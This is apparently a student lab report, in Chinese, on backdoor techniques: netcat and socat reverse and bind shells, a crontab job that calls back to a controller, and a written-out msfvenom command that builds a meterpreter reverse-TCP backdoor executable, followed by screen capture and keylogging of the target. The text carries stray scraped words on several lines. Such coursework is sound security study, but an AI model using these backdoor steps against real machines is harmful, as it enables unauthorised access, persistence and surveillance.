20145320周岐浩 《網絡對抗技術》 後門原理與實踐linux
盜版軟件不安全!正版軟件要收費!反正360都已經把咱們的隱私給賣了...仍是用盜版吧..可是能不給權限盡可能不給權限!通過這幾回實驗感受咱們的電腦簡直不堪一擊,想幹嗎就幹嗎。黑客開心就好...shell
首先先ping通兩臺linux和windows:
windows
打開netcat監聽端口
安全
在windows中使用netcat綁定cmd鏈接到linux的正在監聽的端口bash
方法同上相似,這裏再也不列舉。可是須要注意的是linux的shell應該是在/bin/sh網絡
在linux中使用crontab指令增長一條定時3分鐘任務則利用netcat鏈接道控制端的命令
tcp
windows一直開啓netcat監聽,等到3分後,windows獲取linux的shell成功
網站
在linux中,使用socat綁定bash與端口號,監聽,等待鏈接3d
windows中使用socat對linux進行tcp固定端口鏈接,成功獲取linux的shell!注意所使用的端口號不能被佔用!!code
生成可執行文件(反彈式),肯定好反彈回來的IP地址與端口號。須要注意的是這裏老師給的是
root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.136 `PORT=443 -f exe > meter_backdoor.exe
注意不是`PORT
而是LPORT
(location port!)
在linux中,使用MSF設置好可執行文件對應的IP地址、端口號和payload
後,打開監聽進程
因爲vmware支持直接拖拽,因此省下了傳輸的步驟。在win中雙擊運行可執行文件之前,須要將win中的殺毒軟件與防火牆設置一下。設置後再雙擊啓動win上的可執行文件,linux成功獲取winows的shell
獲取目標主機的當前屏幕
獲取目標主機的擊鍵記錄
這裏能夠看到在小鍵盤和普通鍵盤的輸入並不同。
在提權的過程當中失敗了